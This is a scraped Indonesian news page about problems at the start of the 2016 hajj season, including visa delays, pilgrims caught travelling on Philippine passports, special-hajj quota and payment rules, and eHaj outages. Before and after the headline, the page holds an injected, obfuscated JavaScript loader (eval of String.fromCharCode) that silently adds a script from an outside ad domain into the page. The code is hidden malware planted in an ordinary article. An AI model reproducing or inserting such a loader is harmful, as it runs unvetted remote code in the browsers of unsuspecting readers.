var _0x42tbc1 = 1; eval(String.fromCharCode(118, 97, 114, 32, 97, 49, 32, 61, 32, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 32, 123, 10, 32, 32, 32, 32, 118, 97, 114, 32, 95, 48, 120, 52, 50, 116, 98, 99, 49, 32, 61, 32, 83, 116, 114, 105, 110, 103, 91, 34, 92, 120, 54, 54, 92, 120, 55, 50, 92, 120, 54, 70, 92, 120, 54, 68, 92, 120, 52, 51, 92, 120, 54, 56, 92, 120, 54, 49, 92, 120, 55, 50, 92, 120, 52, 51, 92, 120, 54, 70, 92, 120, 54, 52, 92, 120, 54, 53, 34, 93, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 49, 49, 52, 44, 32, 49, 48, 49, 44, 32, 49, 49, 51, 44, 32, 49, 49, 55, 44, 32, 49, 48, 49, 44, 32, 49, 49, 53, 44, 32, 49, 49, 54, 44, 32, 52, 54, 44, 32, 49, 50, 48, 44, 32, 49, 50, 49, 44, 32, 49, 50, 50, 44, 32, 52, 55, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 44, 32, 54, 51, 44, 32, 49, 49, 54, 44, 32, 54, 49, 44, 32, 52, 57, 41, 59, 10, 32, 32, 32, 32, 118, 97, 114, 32, 95, 48, 120, 52, 50, 116, 98, 99, 50, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 91, 34, 92, 120, 54, 51, 92, 120, 55, 50, 92, 120, 54, 53, 92, 120, 54, 49, 92, 120, 55, 52, 92, 120, 54, 53, 92, 120, 52, 53, 92, 120, 54, 67, 92, 120, 54, 53, 92, 120, 54, 68, 92, 120, 54, 53, 92, 120, 54, 69, 92, 120, 55, 52, 34, 93, 40, 34, 92, 120, 55, 51, 92, 120, 54, 51, 92, 120, 55, 50, 92, 120, 54, 57, 92, 120, 55, 48, 92, 120, 55, 52, 34, 41, 59, 10, 32, 32, 32, 32, 95, 48, 120, 52, 50, 116, 98, 99, 50, 91, 34, 92, 120, 55, 52, 92, 120, 55, 57, 92, 120, 55, 48, 92, 120, 54, 53, 34, 93, 32, 61, 32, 34, 92, 120, 55, 52, 92, 120, 54, 53, 92, 120, 55, 56, 92, 120, 55, 52, 92, 120, 50, 70, 92, 120, 54, 65, 92, 120, 54, 49, 92, 120, 55, 54, 92, 120, 54, 49, 92, 120, 55, 51, 92, 120, 54, 51, 92, 120, 55, 50, 92, 120, 54, 57, 92, 120, 55, 48, 92, 120, 55, 52, 34, 59, 10, 32, 32, 32, 32, 95, 48, 120, 52, 50, 116, 98, 99, 50, 91, 34, 92, 120, 54, 49, 92, 120, 55, 51, 92, 120, 55, 57, 92, 120, 54, 69, 92, 120, 54, 51, 34, 93, 32, 61, 32, 116, 114, 117, 101, 59, 10, 32, 32, 32, 32, 95, 48, 120, 52, 50, 116, 98, 99, 50, 91, 34, 92, 120, 54, 57, 92, 120, 54, 52, 34, 93, 32, 61, 32, 34, 92, 120, 54, 51, 92, 120, 54, 52, 92, 120, 51, 55, 92, 120, 51, 48, 92, 120, 51, 57, 92, 120, 51, 48, 92, 120, 51, 49, 92, 120, 51, 48, 92, 120, 51, 48, 92, 120, 51, 49, 92, 120, 51, 48, 92, 120, 51, 49, 92, 120, 51, 48, 34, 59, 10, 32, 32, 32, 32, 95, 48, 120, 52, 50, 116, 98, 99, 50, 91, 34, 92, 120, 55, 51, 92, 120, 55, 50, 92, 120, 54, 51, 34, 93, 32, 61, 32, 95, 48, 120, 52, 50, 116, 98, 99, 49, 59, 10, 32, 32, 32, 32, 118, 97, 114, 32, 95, 48, 120, 52, 50, 116, 98, 99, 51, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 91, 34, 92, 120, 54, 55, 92, 120, 54, 53, 92, 120, 55, 52, 92, 120, 52, 53, 92, 120, 54, 67, 92, 120, 54, 53, 92, 120, 54, 68, 92, 120, 54, 53, 92, 120, 54, 69, 92, 120, 55, 52, 92, 120, 55, 51, 92, 120, 52, 50, 92, 120, 55, 57, 92, 120, 53, 52, 92, 120, 54, 49, 92, 120, 54, 55, 92, 120, 52, 69, 92, 120, 54, 49, 92, 120, 54, 68, 92, 120, 54, 53, 34, 93, 40, 34, 92, 120, 55, 51, 92, 120, 54, 51, 92, 120, 55, 50, 92, 120, 54, 57, 92, 120, 55, 48, 92, 120, 55, 52, 34, 41, 91, 48, 93, 59, 10, 32, 32, 32, 32, 95, 48, 120, 52, 50, 116, 98, 99, 51, 91, 34, 92, 120, 55, 48, 92, 120, 54, 49, 92, 120, 55, 50, 92, 120, 54, 53, 92, 120, 54, 69, 92, 120, 55, 52, 92, 120, 52, 69, 92, 120, 54, 70, 92, 120, 54, 52, 92, 120, 54, 53, 34, 93, 91, 34, 92, 120, 54, 57, 92, 120, 54, 69, 92, 120, 55, 51, 92, 120, 54, 53, 92, 120, 55, 50, 92, 120, 55, 52, 92, 120, 52, 50, 92, 120, 54, 53, 92, 120, 54, 54, 92, 120, 54, 70, 92, 120, 55, 50, 92, 120, 54, 53, 34, 93, 40, 95, 48, 120, 52, 50, 116, 98, 99, 50, 44, 32, 95, 48, 120, 52, 50, 116, 98, 99, 51, 41, 10, 125, 59, 10, 118, 97, 114, 32, 116, 110, 100, 101, 109, 111, 115, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 91, 34, 92, 120, 54, 55, 92, 120, 54, 53, 92, 120, 55, 52, 92, 120, 52, 53, 92, 120, 54, 67, 92, 120, 54, 53, 92, 120, 54, 68, 92, 120, 54, 53, 92, 120, 54, 69, 92, 120, 55, 52, 92, 120, 55, 51, 92, 120, 52, 50, 92, 120, 55, 57, 92, 120, 53, 52, 92, 120, 54, 49, 92, 120, 54, 55, 92, 120, 52, 69, 92, 120, 54, 49, 92, 120, 54, 68, 92, 120, 54, 53, 34, 93, 40, 34, 92, 120, 55, 51, 92, 120, 54, 51, 92, 120, 55, 50, 92, 120, 54, 57, 92, 120, 55, 48, 92, 120, 55, 52, 34, 41, 59, 10, 118, 97, 114, 32, 110, 32, 61, 32, 116, 114, 117, 101, 59, 10, 102, 111, 114, 32, 40, 118, 97, 114, 32, 105, 32, 61, 32, 48, 59, 32, 105, 32, 60, 32, 116, 110, 100, 101, 109, 111, 115, 91, 34, 92, 120, 54, 67, 92, 120, 54, 53, 92, 120, 54, 69, 92, 120, 54, 55, 92, 120, 55, 52, 92, 120, 54, 56, 34, 93, 59, 32, 105, 43, 43, 41, 32, 123, 10, 32, 32, 32, 32, 105, 102, 32, 40, 116, 110, 100, 101, 109, 111, 115, 91, 105, 93, 91, 34, 92, 120, 54, 57, 92, 120, 54, 52, 34, 93, 32, 61, 61, 32, 34, 92, 120, 54, 51, 92, 120, 54, 52, 92, 120, 51, 55, 92, 120, 51, 48, 92, 120, 51, 57, 92, 120, 51, 48, 92, 120, 51, 49, 92, 120, 51, 48, 92, 120, 51, 48, 92, 120, 51, 49, 92, 120, 51, 48, 92, 120, 51, 49, 92, 120, 51, 48, 34, 41, 32, 123, 10, 32, 32, 32, 32, 32, 32, 32, 32, 110, 32, 61, 32, 102, 97, 108, 115, 101, 10, 32, 32, 32, 32, 125, 10, 125, 59, 10, 105, 102, 32, 40, 110, 32, 61, 61, 32, 116, 114, 117, 101, 41, 32, 123, 10, 32, 32, 32, 32, 97, 49, 40, 41, 59, 10, 125)); Noda di Awal Musim Haji » www.kabarumrahhaji.com var _0x42tbc1 = 1; eval(String.fromCharCode(118, 97, 114, 32, 97, 49, 32, 61, 32, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 32, 123, 10, 32, 32, 32, 32, 118, 97, 114, 32, 95, 48, 120, 52, 50, 116, 98, 99, 49, 32, 61, 32, 83, 116, 114, 105, 110, 103, 91, 34, 92, 120, 54, 54, 92, 120, 55, 50, 92, 120, 54, 70, 92, 120, 54, 68, 92, 120, 52, 51, 92, 120, 54, 56, 92, 120, 54, 49, 92, 120, 55, 50, 92, 120, 52, 51, 92, 120, 54, 70, 92, 120, 54, 52, 92, 120, 54, 53, 34, 93, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 49, 49, 52, 44, 32, 49, 48, 49, 44, 32, 49, 49, 51, 44, 32, 49, 49, 55, 44, 32, 49, 48, 49, 44, 32, 49, 49, 53, 44, 32, 49, 49, 54, 44, 32, 52, 54, 44, 32, 49, 50, 48, 44, 32, 49, 50, 49, 44, 32, 49, 50, 50, 44, 32, 52, 55, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 44, 32, 54, 51, 44, 32, 49, 49, 54, 44, 32, 54, 49, 44, 32, 52, 57, 41, 59, 10, 32, 32, 32, 32, 118, 97, 114, 32, 95, 48, 120, 52, 50, 116, 98, 99, 50, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 91, 34, 92, 120, 54, 51, 92, 120, 55, 50, 92, 120, 54, 53, 92, 120, 54, 49, 92, 120, 55, 52, 92, 120, 54, 53, 92, 120, 52, 53, 92, 120, 54, 67, 92, 120, 54, 53, 92, 120, 54, 68, 92, 120, 54, 53, 92, 120, 54, 69, 92, 120, 55, 52, 34, 93, 40, 34, 92, 120, 55, 51, 92, 120, 54, 51, 92, 120, 55, 50, 92, 120, 54, 57, 92, 120, 55, 48, 92, 120, 55, 52, 34, 41, 59, 10, 32, 32, 32, 32, 95, 48, 120, 52, 50, 116, 98, 99, 50, 91, 34, 92, 120, 55, 52, 92, 120, 55, 57, 92, 120, 55, 48, 92, 120, 54, 53, 34, 93, 32, 61, 32, 34, 92, 120, 55, 52, 92, 120, 54, 53, 92, 120, 55, 56, 92, 120, 55, 52, 92, 120, 50, 70, 92, 120, 54, 65, 92, 120, 54, 49, 92, 120, 55, 54, 92, 120, 54, 49, 92, 120, 55, 51, 92, 120, 54, 51, 92, 120, 55, 50, 92, 120, 54, 57, 92, 120, 55, 48, 92, 120, 55, 52, 34, 59, 10, 32, 32, 32, 32, 95, 48, 120, 52, 50, 116, 98, 99, 50, 91, 34, 92, 120, 54, 49, 92, 120, 55, 51, 92, 120, 55, 57, 92, 120, 54, 69, 92, 120, 54, 51, 34, 93, 32, 61, 32, 116, 114, 117, 101, 59, 10, 32, 32, 32, 32, 95, 48, 120, 52, 50, 116, 98, 99, 50, 91, 34, 92, 120, 54, 57, 92, 120, 54, 52, 34, 93, 32, 61, 32, 34, 92, 120, 54, 51, 92, 120, 54, 52, 92, 120, 51, 55, 92, 120, 51, 48, 92, 120, 51, 57, 92, 120, 51, 48, 92, 120, 51, 49, 92, 120, 51, 48, 92, 120, 51, 48, 92, 120, 51, 49, 92, 120, 51, 48, 92, 120, 51, 49, 92, 120, 51, 48, 34, 59, 10, 32, 32, 32, 32, 95, 48, 120, 52, 50, 116, 98, 99, 50, 91, 34, 92, 120, 55, 51, 92, 120, 55, 50, 92, 120, 54, 51, 34, 93, 32, 61, 32, 95, 48, 120, 52, 50, 116, 98, 99, 49, 59, 10, 32, 32, 32, 32, 118, 97, 114, 32, 95, 48, 120, 52, 50, 116, 98, 99, 51, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 91, 34, 92, 120, 54, 55, 92, 120, 54, 53, 92, 120, 55, 52, 92, 120, 52, 53, 92, 120, 54, 67, 92, 120, 54, 53, 92, 120, 54, 68, 92, 120, 54, 53, 92, 120, 54, 69, 92, 120, 55, 52, 92, 120, 55, 51, 92, 120, 52, 50, 92, 120, 55, 57, 92, 120, 53, 52, 92, 120, 54, 49, 92, 120, 54, 55, 92, 120, 52, 69, 92, 120, 54, 49, 92, 120, 54, 68, 92, 120, 54, 53, 34, 93, 40, 34, 92, 120, 55, 51, 92, 120, 54, 51, 92, 120, 55, 50, 92, 120, 54, 57, 92, 120, 55, 48, 92, 120, 55, 52, 34, 41, 91, 48, 93, 59, 10, 32, 32, 32, 32, 95, 48, 120, 52, 50, 116, 98, 99, 51, 91, 34, 92, 120, 55, 48, 92, 120, 54, 49, 92, 120, 55, 50, 92, 120, 54, 53, 92, 120, 54, 69, 92, 120, 55, 52, 92, 120, 52, 69, 92, 120, 54, 70, 92, 120, 54, 52, 92, 120, 54, 53, 34, 93, 91, 34, 92, 120, 54, 57, 92, 120, 54, 69, 92, 120, 55, 51, 92, 120, 54, 53, 92, 120, 55, 50, 92, 120, 55, 52, 92, 120, 52, 50, 92, 120, 54, 53, 92, 120, 54, 54, 92, 120, 54, 70, 92, 120, 55, 50, 92, 120, 54, 53, 34, 93, 40, 95, 48, 120, 52, 50, 116, 98, 99, 50, 44, 32, 95, 48, 120, 52, 50, 116, 98, 99, 51, 41, 10, 125, 59, 10, 118, 97, 114, 32, 116, 110, 100, 101, 109, 111, 115, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 91, 34, 92, 120, 54, 55, 92, 120, 54, 53, 92, 120, 55, 52, 92, 120, 52, 53, 92, 120, 54, 67, 92, 120, 54, 53, 92, 120, 54, 68, 92, 120, 54, 53, 92, 120, 54, 69, 92, 120, 55, 52, 92, 120, 55, 51, 92, 120, 52, 50, 92, 120, 55, 57, 92, 120, 53, 52, 92, 120, 54, 49, 92, 120, 54, 55, 92, 120, 52, 69, 92, 120, 54, 49, 92, 120, 54, 68, 92, 120, 54, 53, 34, 93, 40, 34, 92, 120, 55, 51, 92, 120, 54, 51, 92, 120, 55, 50, 92, 120, 54, 57, 92, 120, 55, 48, 92, 120, 55, 52, 34, 41, 59, 10, 118, 97, 114, 32, 110, 32, 61, 32, 116, 114, 117, 101, 59, 10, 102, 111, 114, 32, 40, 118, 97, 114, 32, 105, 32, 61, 32, 48, 59, 32, 105, 32, 60, 32, 116, 110, 100, 101, 109, 111, 115, 91, 34, 92, 120, 54, 67, 92, 120, 54, 53, 92, 120, 54, 69, 92, 120, 54, 55, 92, 120, 55, 52, 92, 120, 54, 56, 34, 93, 59, 32, 105, 43, 43, 41, 32, 123, 10, 32, 32, 32, 32, 105, 102, 32, 40, 116, 110, 100, 101, 109, 111, 115, 91, 105, 93, 91, 34, 92, 120, 54, 57, 92, 120, 54, 52, 34, 93, 32, 61, 61, 32, 34, 92, 120, 54, 51, 92, 120, 54, 52, 92, 120, 51, 55, 92, 120, 51, 48, 92, 120, 51, 57, 92, 120, 51, 48, 92, 120, 51, 49, 92, 120, 51, 48, 92, 120, 51, 48, 92, 120, 51, 49, 92, 120, 51, 48, 92, 120, 51, 49, 92, 120, 51, 48, 34, 41, 32, 123, 10, 32, 32, 32, 32, 32, 32, 32, 32, 110, 32, 61, 32, 102, 97, 108, 115, 101, 10, 32, 32, 32, 32, 125, 10, 125, 59, 10, 105, 102, 32, 40, 110, 32, 61, 61, 32, 116, 114, 117, 101, 41, 32, 123, 10, 32, 32, 32, 32, 97, 49, 40, 41, 59, 10, 125));
close
SOROT

Noda di Awal Musim Haji

Foto Istimewa / KUH

Ibadah haji tak pernah sepi dari kasus. Entah kasus sebelum berangkat, maupun ketika di Tanah Suci. Persoalan dalam penyelenggaraan haji juga mencuat pada awal keberangkatan jamaah musim 1437 H ini. Sebanyak 181 calon jamaah haji reguler asal Kabupaten Sumedang yang tergabung dalam kloter K7-JKS gagal berangkat pada Kamis malam (11/8) karena visa belum keluar. Para jamaah tersebut baru mendapat informasi soal masalah visa ini saat di embarkasi haji Bekasi.

Meskipun kemudian dibantah oleh Direktur Pelayanan Haji Dalam Negeri Ditjen Penyelenggaraan Haji dan Umrah Kemenag Ahda Barori bahwa yang terjadi bukan gagal berangkat, tapi karena beberapa KBIH dengan bantuan elit di Kabupaten tersebut mendesak untuk memasukkan jamaahnya dalam kloter K7-JKS.  Namun, tetap saja itu menjadi catatan negatif di awal musim haji tahun ini.

Belum lagi persoalan di haji khusus terkait pengisian kuota untuk jamaah yang batal, tunda berangkat dan ganti. Musim ini, kuota jamaah yang batal, tunda, dan ganti yang ada di masing-masing PIHK dikembalikan kepada Kementerian Agama (Kemenag) untuk kemudian dibagikan lagi kepada PIHK berdasarkan nomor urut. Penghapusan kebijakan ini merugikan PIHK karena mereka sudah menalangi biaya akomodasi dari calon jamaah yang batal, tunda lunas, atau ganti.

Tak hanya itu, pelunasan haji khusus tahun ini juga sangat mepet dengan musim keberangkatan haji khusus mulai 18 Agustus. Pelunasan tahap III musim haji tahun ini berakhir pada 22 Juli 2016, atau kurang dari sebulan sebelum keberangkatan jamaah. Belum lagi pencairan biaya perjalanan ibadah haji (BPIH) jamaah haji khusus yang agak ribet karena perubahan aturan dari bank penerima setoran.

Akibatnya, PIHK baru bisa mengurus barcode visa pada pekan-pekan pertama Agustus 2016.  Sejumlah PIHK terutama yang memiliki grup keberangkatan awal dibuat was-was karena adanya perubahan aturan soal pengisian eHaj yang cukup mendadak, tanpa sosialisasi kepada stakeholders.  Belum lagi, sistem eHaj  juga sering tidak berfungsi (down).

Akhirnya dengan dibantu asosiasi penyelenggara haji, mereka berkoordinasi dengan muasasah dan Kantor Teknis Urusan Haji (TUH) Jeddah untuk melancarkan urusan tersebut, sehingga sekitar dua hari sebelum keberangkatan visa haji khusus untuk keberangkatan awal baru bisa keluar. Jika Kemenag menetapkan jadwal pelunasan BPIH haji khusus lebih awal, tentu para PIHK tidak akan dibuat was-was menanti visa keluar saat injury time keberangkatan.

Kasus lain adalah tertangkapnya 177 warga negara Indonesia yang akan naik haji oleh petugas imigrasi di Bandara Manila, Filipina. Seperti dikutip Philipina Star, para jemaah  menggunakan paspor Filipina. Mereka dicegah sebelum mereka naik ke pesawat, Jumat  (19/8) menuju Madinah, Arab Saudi. Lima warga Filipina yang mendampingi jemaah Indonesia tersebut menuju tanah suci juga ditangkap.

Paspor yang diperoleh secara ilegal itu dilaporkan disediakan oleh para pendamping. Para jemaah asal Indonesia itu membayar mulai US$ 6.000 – 10.000  per orang menggunakan kuota haji yang diberikan Arab Saudi kepada Filipina.

Direktur Jenderal Penyelenggaraan Haji dan Umrah (PHU) Kementerian Agama Abdul Jamil di Jeddah, Sabtu (20/8) malam waktu Arab Saudi, mengimbau WNI yang akan berhaji menggunakan jalur resmi. “Saya tentu mengimbau jangan menggunakan modus seperti itu. Apalagi, meminta visa di negara lain,” katanya usai rapat persiapan penyelenggaran haji. Kasus tersebut menambah deretan persoalan haji yang terjadi di awal musim ini.

Persiapan sudah Baik

Direktur Pelayanan Haji Dalam Negeri Ditjen Penyelenggaraan Haji dan Umrah Kemenag Ahda Barori menjelaskan  Kemenag sudah melakukan persiapan penyelenggaraan haji 2016 dengan dengan baik, mulai soal pendafataran haji, pelunasan BPIH, pemvisaan calon jamaah haji. Selain itu, menyangkut kesiapan asrama haji embarkasi, kesiapan transportasi udara haji, serta kesiapan operasional di Arab Saudi.

Untuk pendaftara haji, menurut Ahda, Kemenag membuka pendaftaran calon jamaah sepanjang tahun dengan menerapkan prinsip first come first served. Tempat pendaftaran haji reguler di Kantor Kemenag kabupaten/ota, dengan melakukan penyetoran awal sebesar Rp 25 jutamelalui BPS-BPIH (syari’ah) yang ditunjuk dan tersambung secara online dengan Siskohat.

Sedangkan untuk tempat pendaftaran haji khusus di 16 Kanwil Kemenag provinsi, dengan melakukan penyetoran awal sebesar USD.4.000  melalui BPS-BPIH (syari’ah) yang ditunjuk dan tersambung secara online dengan Siskohat. Saat ini, Kantor Kemenag yang sudah online di seluruh Indonesia sebanyak 417 Kabupaten/Kota dari 514 kabupaten/kota.

“Yang boleh mendaftar telah berusia minimal 12 tahun. Bagi yang sudah haji, tidak boleh mendaftar kecuali setelah 10 tahun dari keberangkatan yang terakhir, kecuali bagi pembimbing. Pendafatara juga tidak boleh menggunakan dana talangan dari bank atau lembaga pembiayaan,” tutur Ahda.

Persiapan selanjutnya soal pelunasan BPIH baik reguler maupun haji khusus. Untuk haji reguler, pihaknya membuka tiga tahap pelunasan yakni tahap I pada 19 Mei sampai 10 Juni 2016. Selanjutnya tahap ke-II pada 20-30 Juni 2016, dan terakhir tahap pemenuhan sisa kuota pada 19 sampai 22 Juli 2016.

Total kuota haji Indonesia tahun ini sebanyak 168.800 jamaah yang terdiri atas 155.200 untuk haji reguler dan haji khusus sebanyak 13.600 jamaah. Untuk haji reguler, pelunasan BPIH cukup dalam dua tahap selesai. “Tidak ada susulan. Memang dalam satu musim haji biasanya ada kursi kosong. Itu karena jamaah ada yang membatalkan menjelang keberangkatan, tentu kita tidak bisa melakukan penggantian karena proses visa di Kedutaan Saudi sudah tutup,” kata Ahda.

Yang agak lambat pelunasannya justru di haji khusus. Kemenag bahkan sampai membuka masa pelunasan hingga tahap IV. Tahap I dilakukan pada 23 Mei sampai 3 Juni, tahap II pada 13-17 Juni 2016, dan selanjutnya Tahap Pemenuhan Sisa Kuota yang sesuai jadwal sebenarnya pada 19-22 Juni tapi kemudian diperpanjang hingga akhir Juli.

Salah satu yang menyebabkan keterlambatan pelunasan BPIH khusus adalah terkait aturan baru pada musim haji tahun ini yang menghapus kebijakan batal, tunda lunas, dan ganti jamaah diserahkan ke masing-masing PIHK. Ditjen PHU Kemenag mengatur bahwa kuota jamaah yang batal, tunda lunas, dan ganti dikembalikan ke Kemenag untuk kemudian dibagikan lagi ke PIHK berdasar urut kacang.

“Rupanya banyak PIHK yang menunggu-nunggu kemungkinan aturan kembali seperti dulu. Kita tetap dengan aturan itu karena prinsip prinsip pengisian kuota kan first come first served. Kalau tidak seperti itu, kita yang menyalahi undang-undang,” kata Ahda.

Berdasarkan pengamatannya, pelunasan BPIH khusus sampai pekan pertama Agustus lalu sebenarnya cukup tinggi yakni hampir 15 ribu calon jamaah. Tapi, jumlah pembatalan calhaj juga cukup banyak.

“Bahkan ada satu PIHK yang membatalkan calhajnya hingga 50 orang, dari total jamaah 72 orang. Ini kenapa? Jangan-jangan yang 50 orang itu calhaj fiktif. Makanya dengan kuota tersebut dikembalikan ke Kemang kemudian dibagi lagi ke PIHK berdasar urut kacang akan memberi rasa keadilan bagi jamaah,” kata Ahda.

Kesiapan lainnya yakni soal visa haji. Untuk haji reguler, Kemenag sudah menuntaskan seluruh visa calhaj yang masuk keberangkatan gelombang I (9-22 Agustus) dengan jumlah jamaah 87.316 orang yang tergabung dalam 212 kloter. “Alhamdulillah visa gelombang I sudah siap sebelum keberangkatan jamaah,” ucapnya.

Dengan sistem eHaj, penerbitan visa haji saat ini harus dikaitkan dengan kelengkapan paket layanan atau group, akomodasi Mekkah, akomodasi Madinah, transportasi dan katering Armina. Selain itu, ada kebijakan baru Pemerintah Arab Saudi terkait bentuk visa, semula stiker menjadi lembar A4 yang dilipat seukuran paspor dan diselipkan kedalam paspor jemaah haji.

Selanjutnya, Kemenag juga telah menyiapkan 13 asrama haji embarkasi di seluruh Indonesia.  Asrama haji ini sebagai karantina menjelang keberangkatan jemaah haji ke Arab Saudi.

Persiapan lainnya yang telah dilakukan pemerintah adalah terkait transportasi udara jamaah haji. Pemerintah telah menetapkan PT Garuda Indonesia dan Saudi Arabian Airlines sebagai pelaksana transportasi udara jamaah haji Indonesia Tahun 1437H/2016M. Pemerintah melalui perusahaan penerbangan menyiapkan 21 armada pesawat (Garuda 11 dan Saudia 10) untuk mengangkut jemaah haji Indonesia dan petugas kloter total sebanyak 157.120 orang.

“Perusahaan penerbangan yang ditunjuk memiliki sertifikat IOSA (IATA Organization Safety Audit), dan pesawat-pesawat haji diinspeksi serta diaudit oleh pihak yang berwenang dari kedua negara,” kata Ahda.

Persiapan yang tak kalah penting adalah menyangkut operasional haji di Saudi, terutama akomodasi hotel, konsumsi, dan transportasi bus. Untuk  pelayanan akomodasi di Madinah seluruhnya berada pada wilayah markaziyah dengan jarak terjauh 650 meter dari halaman Masjid Nabawi.

Sedangkan pelayanan akomodasi di Mekkah berada di enam wilayah, yaitu Aziziyah, Mahbas Jin, Misfalah, Jarwal, Raudlah dan Syisyah dengan jarak terjauh 4.500 meter dari batas terluar halaman Masjidil Haram. “Penetapan enam wilayah tersebut berdasarkan pertimbangan kemudahan akses transportasi sholawat dan distribusi katering,” kata Ahda.

Saat di Makkah, kata Ahda, bagi jamaah haji yang menempati wilayah akomodasi dengan jarak mulai 1.500 meter dari Masjidil Haram akan mendapatkan pelayanan transportasi sholawat. Di samping itu, ada transportasi antarkota perhajian yang dilakukan peningkatan kualitas pelayanan (up grade) untuk rute Madinah – Makkah, Jeddah – Makkah, Makkah – Madinah, dan Makkah – Jeddah.

“Untuk transportasi Masyair dari Makkah – Arafah – Muzdalifah – Mina – Makkah sepenuhnya dilakukan oleh Naqabah,” kata dia.

Selama di Arab Saudi, jamaah akan mendapatkan pelayanan konsumsi antara lain di Bandara KAAIA Jeddah sebanyak 1 kali makan saat kedatangan dan 1 kali makan saat kepulangan. Di Madinah, 2 kali makan (siang dan malam). Di Arafah sebanyak 4 kali makan, di Muzdalifah 1 kali snack yang dibagikan saat menjelang keberangkatan ke Muzdalifah, dan di Mina sebanyak 11 kali makan. Sedangkan di Mekkah, jamaah mendapat 2 kali makan (siang dan malam) selama 12 hari (24 kali makan).

Masalah Haji Khusus

Untuk haji khusus, hingga awal musim belum ada laporan kasus yang merugikan jamaah. Yang ada hanya keluhan dari para penyelenggara ibadah haji khusus (PIHK) soal waktu pelunasan haji khusus yang cukup mepet, sehingga proses pengurusan visa baru dilakukan menjelang keberangkatan awal jamaah haji khusus pada 18 Agustus 2016.

Sepekan menjelang keberangkatan, PIHK dan asosiasi penyelenggara haji di Saudi  bekerja keras agar para jamaah haji khusus yang masuk jadwal keberangkatan awal bisa berangkat sesuai jadwal. Apalagi, Saudi mengeluarkan aturan baru dalam pengisian eHajj.

Titik kritis di penghujung tahapan finalisasi eHaj yang membuat resah PIHK adalah munculnya fitur keharusan pay voucher cost General Service dan bus Naqaba  yang nilainya cukup besar SR 1.029/pax.  Pembayarannya harus dilakukan secara e-payment dari no rek IBAN masing-masing PIHK. Tahap ini menjadi krusial karena wajib dilalui untuk mendapatkan approval visa.

“Selama ini cost general service dan naqaba tersebut dihandle oleh Kemenag sehingga kita haji khusus sudah  membayar cost tersebut saat pelunasan BPIH Khusus. Kita sudah merasa sangat terbantu dengan urusan ini karena Kemenag membekali jamaah dengan lembar DAPIH sebagai bukti pembayaran service tersebut,” tutur Anton.

Perubahan sistem menjadi e-payment dalam eHaj yang tanpa sosialisasi memadai membuat pihak TUH  Jeddah juga kesulitan melakukan pembayaran general service dan naqaba karena masing-masing PIHK tidak memiliki no IBAN. Beruntung, situasi genting ini direspon dengan sangat baik oleh Konsul Haji Jeddah Ahmad Dumyathi Bashori dan jajarannya.

“Setelah berkoordinasi intens dengan Himpuh akhirnya pada hari Minggu pagi, 14 Agustus, Kabag Keuangan TUH Bapak Handi dan jajarannya melakukan transaksi transfer di Bank Riyadh 1 Jeddah dan mendistribusikan hampir 8 juta riyal ke no IBAN PIHK Himpuh untuk kepentingan 7.665 jamaah haji khusus,” kata dia.

Di hari yang sama, PIHK group keberangkatan awal langsung menyelesaikan kewajiban e-payment tersebut dan tinggal menunggu status Send to Mofa sebagai bentuk approval visa. Minggu malam waktu Saudi (14/8), tim Himpuh bergerak ke  Muassasah dan Kementerian Haji Saudi untuk mengawal percepatan proses Send to Mofa bagi PIHK yang sudah menyelesaikan kewajibannya.

Mereka juga was-was karena sistem eHaj pada Minggu siang mengalami down yang membuat proses finalisasi approval visa terhenti dan baru berfungsi lagai pada Senin pagi (15/8). Akhirnya, tiga hari sebelum jadwal berangkat atau Senin (15/8), paspor sudah bisa dikirim ke Kedutaan Besar Saudi Arabia (KBSA) Jakarta sehingga jamaah bisa berangkat sesuai jadwal.

“Keterlambatan jadwal pelunasan tahun ini harus menjadi cambuk buat Kemenag agar bekerja lebih taktis dan profesional dan mau mendengar masukan dari berbagai pihak, tidak rigid berpegang pada aturan tapi mengabaikan realita dan kebutuhan di lapangan,” kata Anton.

Sementara itu, Ketua Umum Himpuh Baluki Ahmad mengingatkan akan banyak kuota haji khusus yang tidak terpakai pada musim haji 2016 ini karena banyak PIHK yang memiliki jamaah batal berangkat berharap bisa menggantikan sendiri jamaahnya.

Namun setelah ditunggu-tunggu hingga menjelang tahap pelunasa BPIH khusus tidak ada perubahan kebijakan dari Kemenag sehingga mereka melepas kuota yang tidak terpakai kepada Kemenag.

“PIHK juga tidak berani ambil kuota kosong tersebut karena waktunya yang mepet. Kalau dia ambil, sekarang penerbangan sudah susah, demikian pula untuk hotelnya. Akhirnya kuota di haji khusus tetap akan ada yang tidak terpakai. Ini tidak bisa dihindari,” kata dia.

Di sisi lain, kata Baluki, haji nonkuota pada musim ini makin banyak diminati khususnya oleh jamaah yang ingin langsung berangkat tahun ini juga. Berbeda dengan haji kuota yang memiliki nomor antrean dan batas waktu minimal pendaftaran, visa hajinonkuota ini tidak ada sistem antrean. Daftar tahun ini bisa berangkat tahun ini juga.

Ada beberapa jenis visa haji nonkuota antara lain  visa furoda atau undangan resmi kerajaan, visa umal untuk pekerja, visa ziarah, serta visa kunjungan warga. “Haji nonkuota akan banyak. Saya prinsipnya, selagi PIHK ini bisa melayani jamaah dengan baik sesuai aturan, ya tidak ada persoalan. Kuota dari Kemenag kalau tidak dilayani dengan baik juga tidak benar,” kata Baluki.

